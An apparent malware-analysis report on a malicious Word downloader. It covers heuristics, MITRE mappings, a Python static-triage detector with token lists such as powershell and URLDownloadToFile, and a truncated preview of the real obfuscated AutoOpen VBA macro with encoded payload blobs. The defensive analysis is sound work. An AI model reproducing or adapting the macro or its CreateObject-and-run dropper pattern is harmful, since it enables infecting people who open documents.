Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1105 Ingress Tool Transfer
The file is a malicious Office document carrying a VBA project. The recovered source contains an 'AutoOpen' auto-execution macro and calls 'CreateObject', so arbitrary code runs as soon as the document is opened with macros enabled. Together with the ClamAV signature 'Doc.Malware.Emodldr-10025032-0' (a document-based downloader family) and the obfuscation visible in the source (randomised identifiers, 'Select Case' branches that compare never-assigned variables against constants and therefore never run, 15 long base64-like string blobs fed through a single decoder function under 'On Error Resume Next'), this is a first-stage downloader that decodes and executes a second-stage payload via the 'CreateObject' call. Two details matter for reading the heuristics: 'macros.bas' is the filename olevba gave the carved source, not a module name (the recovered modules are 'PhoNjoqrQYVI', the ThisDocument class, and 'PkAiIXtTisuJw'); and the legacy WordBasic auto-exec finding fires on the same 'AutoOpen' token and adds no independent evidence here, since a modern VBA project was recovered. The only extracted URL, http://schemas.openxmlformats.org/drawingml/2006/main, is an OOXML schema namespace from the document body and is not a network indicator; the real download destination is presumably inside the encoded blobs and would have to be recovered by decoding them or by dynamic analysis.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41211 bytes |

SHA-256: 212a0aade417c4bd13484b6fe47973b96c2fe173acd30bf31db83d3771dddf7f
Detection: ClamAV reports no threats on the carved artifact itself (the Emodldr signature fires on the container document, not on the decoded source).
Obfuscation or payload: likely. The carved artifact contains 15 long base64-like blob(s).
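The heuristics above (OLE_VBA_MACROS, OLE_VBA_AUTOOPEN, OLE_VBA_CREATEOBJ, OLE_VBA_PCODE_AUTOEXEC_EXEC and the base64-blob check behind EXTRACTED_FILE_STATIC_TRIAGE) are simple enough to reproduce on the olevba output. The following is an added example written for this page, not the analyzer's own code: a static triage pass that scans extracted VBA source for auto-execution procedures, object-execution tokens, long base64-like string literals and the `name("<blob>", <int>, <int>)` decoder-call shape seen in the preview, and a raw-byte variant of the p-code rule for streams where no source was recovered. The token lists, the 40-character/90% blob threshold, the decoder-call regex, the `verdict` tiers and the `OLE_VBA_EXEC_TOKEN` rule name are assumptions chosen for illustration; `SAMPLE_VBA` is a constructed snippet in the style of the preview, not the carved macros.bas. The rule IDs and severities it emits are taken from this report.

```python
"""Static triage of extracted VBA source and compiled-stream bytes, modelled on
the report's OLE_VBA_* and EXTRACTED_FILE_STATIC_TRIAGE heuristics.

Added example, not the analyzer's own code. Token lists, thresholds and the
decoder-call pattern are assumptions; SAMPLE_VBA is constructed, not macros.bas.
"""
import re
from dataclasses import dataclass, field

# Assumed token lists: auto-execution procedure names and execution/download terms.
AUTOEXEC_NAMES = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
                  "Document_Open", "Workbook_Open")
EXEC_TOKENS = ("CreateObject", "GetObject", "WScript.Shell", "Shell",
               "URLDownloadToFile", "XMLHTTP", "powershell", "cmd.exe")

PROC_DEF = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)",
                      re.IGNORECASE | re.MULTILINE)
STRING_LIT = re.compile(r'"([^"\n]*)"')
B64_CHARS = re.compile(r"[A-Za-z0-9+/=]")
# name("<long literal>", <int>, <int>): the shape of the decoder calls in the preview
DECODER_CALL = re.compile(r'(\w+)\("[^"\n]{20,}",\s*\d+,\s*\d+\)')

# Constructed sample in the style of the preview (dead Select Case, blob decoder, AutoOpen).
SAMPLE_VBA = '''Attribute VB_Name = "PkAiIXtTisuJw"
Function qjRjpujbaud()
    On Error Resume Next
    Select Case uAImAq
        Case 54774
            iuTYhO = Hex(78932 - CSng(35713) - 67217 + ChrW(XlTiid))
    End Select
    zUUhRSQw = lmIitb("U8Uu2AANAYGAyAgMAgDA2AQZAQDAlBQNAcDA4AgZAUGA0AwYAUGAhBgNAYDAmBgYAMDA1AAOAIGAkBwNAYDAhBANAQDA5AQOAQDAwAgMAEGA3AgMAYDAlBgZAcui", 3, 118)
    KftOqikqJQ = lmIitb("icsiAAUDA4AAOAMGAjBwNAQDAmBgNAEDAwAgNAUGA3AQMAEGAjBwYAQGAlBQYAUDA0AANAUDA2Aw%Yw", 4, 71)
    Set obj = CreateObject(zUUhRSQw)
    obj.Run KftOqikqJQ
End Function
Sub AutoOpen()
    qjRjpujbaud
End Sub
'''


@dataclass
class Triage:
    procedures: list
    autoexec: list
    exec_tokens: list
    b64_blobs: int
    decoder_calls: dict
    findings: list = field(default_factory=list)  # (rule_id, severity, detail)


def count_b64_blobs(src, min_len=40, min_ratio=0.9):
    """Count quoted literals long enough and base64-dense enough to be payload blobs."""
    n = 0
    for lit in STRING_LIT.findall(src):
        if len(lit) >= min_len and len(B64_CHARS.findall(lit)) / len(lit) >= min_ratio:
            n += 1
    return n


def triage_vba(src):
    """Run the source-level checks and emit findings with the report's rule IDs."""
    procs = PROC_DEF.findall(src)
    autoexec = [p for p in procs if p.lower() in {a.lower() for a in AUTOEXEC_NAMES}]
    tokens = [t for t in EXEC_TOKENS if re.search(re.escape(t), src, re.IGNORECASE)]
    blobs = count_b64_blobs(src)
    decoders = {}
    for name in DECODER_CALL.findall(src):
        decoders[name] = decoders.get(name, 0) + 1
    t = Triage(procs, autoexec, tokens, blobs, decoders)
    if procs:
        t.findings.append(("OLE_VBA_MACROS", "medium", f"{len(procs)} procedure(s)"))
    for p in autoexec:
        t.findings.append(("OLE_VBA_AUTOOPEN", "high", p))
    for tok in tokens:
        rule = "OLE_VBA_CREATEOBJ" if tok == "CreateObject" else "OLE_VBA_EXEC_TOKEN"
        t.findings.append((rule, "high", tok))
    if blobs or decoders:
        t.findings.append(("EXTRACTED_FILE_STATIC_TRIAGE", "info",
                           f"{blobs} long base64-like blob(s); decoder candidates {decoders}"))
    return t


def verdict(t):
    """Assumed tiers: auto-exec plus an execution token is the downloader pattern."""
    if t.autoexec and t.exec_tokens:
        return "malicious"
    if t.exec_tokens or t.b64_blobs or t.decoder_calls:
        return "suspicious"
    return "macro-only" if t.procedures else "no-macro"


def pcode_autoexec(stream):
    """Raw-byte form of the p-code rule for when source extraction fails: require an
    auto-exec name and an execution token in the same stream, in ANSI or UTF-16LE."""
    def present(tok):
        return any(re.search(re.escape(tok.encode(enc)), stream, re.IGNORECASE)
                   for enc in ("latin-1", "utf-16-le"))
    auto = [t for t in AUTOEXEC_NAMES if present(t)]
    execs = [t for t in EXEC_TOKENS if present(t)]
    return bool(auto and execs), auto, execs


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    for rule, sev, detail in result.findings:
        print(f"{sev:8} {rule}: {detail}")
    print("verdict:", verdict(result))
```

On the constructed sample this reports the same four source-level findings as the page (macros, AutoOpen, CreateObject, static triage with two blobs and one decoder candidate called twice) and a malicious verdict; `pcode_autoexec` is the fallback for the OLE_VBA_PCODE_AUTOEXEC_EXEC case and should be run over the raw `_VBA_PROJECT` and module streams, not over decompressed source.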
Preview script (first 1,000 lines of the extracted script)

The listing opens with the attribute header of the document class module 'PhoNjoqrQYVI' (VB_Base = "1Normal.ThisDocument"), followed by the standard module 'PkAiIXtTisuJw'. Every 'Select Case' block tests a variable that is never assigned in the visible source against a constant and so never executes; the only statements that do work are the 'lmIitb(<blob>, <int>, <int>)' calls, which decode the string blobs while 'On Error Resume Next' suppresses any failure.

```vb
Attribute VB_Name = "PhoNjoqrQYVI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "PkAiIXtTisuJw"
Function qjRjpujbaud()
On Error Resume Next
Select Case uAImAq
Case 54774
iuTYhO = Hex(78932 - CSng(35713) - 67217 + ChrW(XlTiid))
dMjtOw = AJofOn
End Select
zUUhRSQw = lmIitb("U8Uu2AANAYGAyAgMAgDA2AQZAQDAlBQNAcDA4AgZAUGA0AwYAUGAhBgNAYDAmBgYAMDA1AAOAIGAkBwNAYDAhBANAQDA5AQOAQDAwAgMAEGA3AgMAYDAlBgZAcui", 3, 118)
Select Case nzQdq
Case 8727
EVicfv = Hex(68283 - CSng(44976) - 19095 + ChrW(VftXd))
wPvcYY = JDvVj
End Select
Select Case ljCGN
Case 13182
ZDinZ = Hex(92559 - CSng(42707) - 24887 + ChrW(IdFqYo))
OOBjXX = nBCizL
End Select
KftOqikqJQ = lmIitb("icsiAAUDA4AAOAMGAjBwNAQDAmBgNAEDAwAgNAUGA3AQMAEGAjBwYAQGAlBQYAUDA0AANAUDA2Aw%Yw", 4, 71)
Select Case qqmuzo
Case 31212
hwWLnU = Hex(70341 - CSng(60203) - 62757 + ChrW(wzorMa))
CMvlXN = BwSnT
End Select
Select Case flcqH
Case 46640
VsjoEF = Hex(60174 - CSng(46867) - 72044 + ChrW(mqEOWV))
EQRNKK = pLiwmT
End Select
lFlFuRwrhA = lmIitb("iquwEzAUGAxAwYAIDAkBwNAUGAjBgMAMGAiBgZAkDAhBgZAMGAwAwYAEGA3AAZAMDAjBgNAQDAmBAOAj", 2, 73)
Select Case PuijCl
Case 33372
fPitn = Hex(2644 - CSng(57366) - 83002 + ChrW(IQpmrH))
LhEzs = imRWXv
End Select
Select Case hYbKG
Case 58714
Ulfolf = Hex(48725 - CSng(6020) - 83194 + ChrW(dQDZkE))
EbKVu = acijap
End Select
sWztDo = lmIitb("oMwAMDA0AwYAkDAwAAZAMGAyAQOAcDAzAQYAYDAkBQNAQGAxAgMAgDAiBQMAkDAyAwNAMGAzAwMAgDA3ikA", 4, 77)
Select Case nwYvMj
Case 6488
UTEAz = Hex(15033 - CSng(24010) - 88876 + ChrW(szUXGi))
TapFM = zwOGC
End Select
Select Case rdItGK
Case 72774
kswiS = Hex(29917 - CSng(23292) - 9808 + ChrW(RDBiMP))
QJwnD = twMSvB
End Select
uHFFzs = lmIitb("D1%QCIAMDAiBAMAMGA3AwYAEGAwAQYAIGA2AQMAgDAkBANAIGAyAAZAEDAkBwMAEGA2AANAUGAmBwNAADAzAQZAIDAxAANAQDAxAQZAMGA5AQMAADAjBwNN", 2, 112)
Select Case OwFji
Case 32839
HBPPbC = Hex(88660 - CSng(68054) - 82226 + ChrW(MiOjd))
LwFwzz = zTKmZ
End Select
Select Case PXwQzV
Case 32659
PNVus = Hex(24187 - CSng(61585) - 87171 + ChrW(JdHIJd))
qrTiu = BzTcnR
End Select
lYBluRn = lmIitb("5DAgYAkDAkBQMAkDAiBwNAMGAmBAMAYGA1AgMAkDAlBgMAQDA2AgMAcDAlBgMAMDAmBgNAEDAwAgMAYGwVvRMjQ", 8, 78)
Select Case ohJKf
Case 87448
IsCYs = Hex(3453 - CSng(54319) - 12645 + ChrW(anFtY))
HCmHnM = aQYOU
End Select
Select Case krlGzX
Case 19716
spkKJ = Hex(73902 - CSng(23510) - 84287 + ChrW(lCFfpd))
PMsCPB = QwzGd
End Select
JXFuLLh = lmIitb("pjipGA3AgMAcDAlBQYAADAhBgNAADAjBgZAMDA3AQMAIGA1AQYAQGAhBgYAIGAiBgNAQDAmBQOAEDAzAgMAYGAhBgYAYGA0AgYAYGAj5", 3, 98)
Select Case wOCuqE
Case 79577
tlVzfo = Hex(87095 - CSng(27299) - 47990 + ChrW(vNqrm))
HErZUN = fisfX
End Select
Select Case JzrRi
Case 30072
iSiMJ = Hex(80854 - CSng(93536) - 39595 + ChrW(DhamoW))
ATfKbS = bCifS
End Select
hJSFhIwBsiA = lmIitb("ii5GA5AgYAADA2AAMAYGA3AQZAkDAyAAZAMGAyAAOAgDA1AAOAEDA3AQMAIDAmBgNAkDAjBQZAMDA3AgMAUDAmBgZAIDAlBQZAUGA5AwYAkDAhBwNAADAmBwMAYGAzAQZAYDAlBgNAIDAhBQOAcDAhB8iw", 4, 148)
Select Case bRsjM
Case 82109
oLOAEM = Hex(76871 - CSng(88001) - 41984 + ChrW(BVnKqw))
FoPvH = iKdwW
End Select
Select Case AiZPbz
Case 80664
iShod = Hex(49332 - CSng(60393) - 80719 + ChrW(MbACrP))
jVYXz = mBOSnD
End Select
FldHDPvsL = lmIitb("74pK9AQNAMDAwAgMAMDA5AAOAMGAmBQOAQGAhBQOAcDAmf", 2, 40)
Select Case lsBhbo
Case 3
```
... (truncated)